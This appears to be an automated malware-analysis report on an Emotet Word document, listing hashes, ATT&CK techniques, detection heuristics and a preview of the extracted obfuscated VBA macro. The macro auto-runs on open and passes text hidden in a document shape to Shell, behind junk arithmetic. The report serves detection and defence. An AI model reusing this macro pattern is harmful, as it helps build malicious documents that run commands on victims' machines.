Emotet Office (OLE) malware analysis — malicious · 36219fcba10366fd

MALICIOUS

Office (OLE)

136.8 KB Created: 2018-12-11 19:27:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: bbdc557c9d2633a2860df0c9ddcda7a1 SHA-1: 0c4614f6222d3cd5c70977bc1e9ca30313874ef9 SHA-256: 36219fcba10366fdf4da3dcb8830360078035bf1bbe0e9a084f619d2ffdf36c3

292 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for Emotet. The macro attempts to execute cmd.exe with specific flags, likely to download and run a secondary payload. Heuristics indicate suspicious cmd.exe and PowerShell invocations, and the ClamAV signature directly identifies it as Emotet.

Heuristics 10

ClamAV: Doc.Malware.Emotet-6780750-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emotet-6780750-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

 _
.Shell(ahtsWlu, oErzu), DQHvS)
   qRoplTGMvSauGKk = (281985326 + Round(LlQwmzsABvEvnjsRIpIMhhA) * 303676712 - EBrttnGLGLniLDU + (okXCRHmicwVciLdlVnhwBGHI / Tan(jhVEjzlnPszcrrzOIRvRdjuh)))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Customizable = True
Sub autoopen()
kcwfdQtdG
```
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4770 bytes
SHA-256: `b5cbb18e474603b6a793a20da4b511b8545b45c6332c7a0cca50a32c9f2e5f6a`
Detection ClamAV: No threats found Obfuscation or payload: likely 135 of 167 identifiers look randomly generated (e.g. 'iWXimYKsVbwtMWSsPcAntrhb') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "FwqGFJCXLnvaw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() kcwfdQtdG End Sub Attribute VB_Name = "RjiTbsXAELWEws" Function kcwfdQtdG() On Error Resume Next nEWpCGwEiaNkaQFFG = (135348292 + Round(dduEdfpllphQlzd) * 288551995 - OdPflwpDhwJpsmhAOCn + (zsKNUNOzJbkwYirdFdrjEBv / Tan(jwtDzQWzpwaVTBKYirtG))) MQNvDvlLHowzihXT = 74351202 EVQkiiBhstdvdEuIC = (10607366 + Round(ZWmJXSwXiFdlPXTc) * 146336823 - GRVWcQXOqjqHUB + (OiwSMtRlLTbPHNXJb / Tan(HvknCtVmIcNhblbUBsX))) JHpjKDBBPBSZOjMF = 211406568 cYfimvAhSstuEHzcjtcwXFM = (161802719 + Round(jRRcSPulGChilsKXBfU) * 28529444 - ZnfDGdzOWXLHIGdjF + (dwIwFStwBRaVZs / Tan(HGdmZLlzXjfWbcljow))) rFJaiMKHcfnBwTnBzzwf = 265944892 YbWkTzUucclNoPCYo = (237480001 + Round(EsKoOACtczYthSwDWYQn) * 340761385 - NsDsKpQihGKotYNnHkQ + (swEiDupLfAXwhci / Tan(kWpNduPRisZZpjQjW))) jRoUoQzEChjNHQtvDlvDbwj = 254588541 ccrJIVpBlUjMGlKXtEUPPUwA = (290493155 + Round(LHkzHmtJEIpMzppNG) * 158207103 - jtfflGMtHjIjqRtKiQ + (NtTzhBijGiZCNYhLVjbzqu / Tan(lZvbwvEfHzRKZNwwdDZFPhh))) IJFYiGRzSBhXlZjlCwSEwNI = 334674153 YUAYPbzVjfNaTI = (267267861 + Round(OpWiCdRtYimQdGuRTrbjaja) * 220489337 - YInfjIhTUwDQVzvDHzho + (sdlwGbjIRiOpFdVdOpaF / Tan(IHrAwsjcSjtswjiCichAKDQo))) PVZZsKGiijWtwIiAfwB = 139149390 sTJzOKdQlLvflPtbrLOvwLMK = (295673666 + Round(XfsAbMwXdXidYJQpiNE) * 68399795 - zuUtXlqAjGwGpmwYl + (jjOlWsOnEfIczGiJakXGD / Tan(IXwQkXjXRRzdViBLYcf))) hKrEHsXfMNAifIYqpGIqE = 218497700 zdKbDdijKAQQwmPREdi = (35918465 + Round(vnhGuSXzWWNXMcmJlhsWYWL) * 303765220 - iCXVrrhthBqdVILGkndDtlJd + (TwliWZcnJQPAiff / Tan(dfbvjQYjPojhqDsttNYu))) KKcOqLsvGGIzXPGihcCYFShp = 304396927 Const oErzu = 0 kiXqfOElufjOSbW = (196162268 + Round(XQouXBacXUnCJzO) * 49484517 - DioUQKPBjVVXYkJASVGXNNdw + (IuRjkiVGVYoplHGZ / Tan(nfEEzkdBrcHjkpErGIQzSzn))) QCMULhNAwUazrJ = 56827757 jaitmrsdqJbfkUfv = (103838534 + Round(SGZJXZZpUWHYUwbE) * 81720172 - wbDtwqjQrYUTWTiuFM + (WCFUzWWWSpcEjIJzoHYIic / Tan(hBVBzouatPQpTrG))) WcUObOTnLNUpmjD = 33952290 QrAWJaMXYwwsvamnsAjTVjff = (88088830 + Round(LPlwfzZTDzfdnY) * 82640009 - jUbEFiRZWafcchLVI + (PwlcSwTbXpHPNHH / Tan(ALDIzjwLZFUwrWl))) UjJQdGBiliGbRHMY = 142375401 Set htFNXlij = FwqGFJCXLnvaw.Shapes(AwzGK + "DjJESGjQHruO" + FhntQdlN) XrhGvJJPUPZHEEtWZfrGMaq = (55596192 + Round(zrYkGLQjtKTjolkOOnk) * 154233098 - RYJqBIcaiwAZjvS + (iODJXLtanltHswmFlViTP / Tan(ECnJLOSJIpSdjZhNhGijDQP))) ijJvoLNwUkJAWOzfHd = 188570856 hnfnwkUQUOETzzmw = (337212041 + Round(DcpAzKBoYuBzsZsivpjaUnKs) * 128230493 - mYCLjEzEDzUhpU + (JMZOXViaQDzRYbPRzjvYcm / Tan(KzznWtNOzMoKbldw))) IzlImmZcniWAuwJXAOQX = 225044322 fbVFQzrjUVpERzc = (255979721 + Round(HHAEZrJUFtTojiX) * 283464442 - IkKODwfkDPTkbWkQi + (TkCFjLkKDXsnmSNzr / Tan(ctDIVUWbpkdXjXCREHODAzd))) uHsPdBWbfsolNKOiiIVAjjo = 133278977 ahtsWlu = htFNXlij.TextFrame.TextRange + ozEjR + TkPPfAD + aLjKq + QimbW + zAQiTp + LwCDPiji + FiNJGMRP + qFzXYWMa + jidlzk uijNKuNcUwvnslwpVYjS = (198375547 + Round(ocjqkjwbwURVCPERuYECU) * 195052605 - tkIUsHpPjwKpGi + (JidtzaVWiilEiKNbPL / Tan(pFcOGTJFiXsazmZOaZa))) bXOalHDLEVXvijoOhPXa = 278712664 iWXimYKsVbwtMWSsPcAntrhb = (123486578 + Round(fcqrifpzibnCZdqvkJRqQwTO) * 300846607 - UTEqovMmthCiwSD + (oqEMDXzwHYKciiIbz / Tan(LWtrnrqmjIsGMwmBIdJ))) CwVGjQljEKZajYHjVwDN = 149121756 jBSAOruNTjKRXiPDofzQi = (272631043 + Round(SBQwTVdwJVWtKEnAhiEk) * 143646475 - RFVVnznwaGuXAw + (uasqmBwBkFwAfQhaEINkKbwh / Tan(IKvPwmDpCmHMuiCUEkPp))) IisjpOmNmTcKMiqBlmSvLddZ = 96267190 RThrPclwdWitcOblKHJiDFt = (279226137 + Round(aLpQqvOXAZuQmHEiEl) * 157871620 - zANNvZJdPoLZrVp + (whmaTVcphVYAFDzUV / Tan(WZwbURmlILNUZQRniWzzl))) XXfaBJYLorDGzPSUMUoi = 90045891 jGQjOFnbXVkAOGVGkEUmZS = (218849524 + Round(KoqJJmzZwWsquCua) * 89983217 - jDIWVmmJRoLwOOZ + (ZaPdSkYKErOfMi / Tan(uYTldEnSDWzVIOzI))) QrcUKkovfwSiYHziiQYv = 188061778 NwHiRUd = Array(YzsCawt, dNwWWR, RBUOKi, Interaction _ _ _ _ _ _ _ _ .Shell(ahtsWlu, oErzu), DQHvS) qRoplTGMvSauGKk = (281985326 + Round(LlQwmzsABvEvnjsRIpIMhhA) * 303676712 - EBrttnGLGLniLDU + (okXCRHmicwVciLdlVnhwBGHI / Tan(jhVEjzlnPszcrrzOIRvRdjuh))) MXWYuhcPEhaRdt = 5179489 bUZtIKvrlOjOQRIilK = (243825202 + Round(ozdXURFnBfiTDCT) * 87454953 - YSrzqqXImbwQGtdsR + (drBZrFHpGfPLOwuONstLw / Tan(FPhpGXvmEblUpVN))) bmqAjrsbNAWrflzGjWmmrBwk = 302747499 tJksfNLiSNtDjJ = (98205526 + Round(iFJSisUQbRUOdhoH) * 91563381 - JwUSUYzjVOwoqnSmi + (NiZAoTROtzBlZmpRzSsQk / Tan(TwXGUnahvrCDufsJIAAGf))) fjpJwZnAtOAdPb = 194025532 End Function

Open this report in the interactive analyzer, or submit your own file for analysis.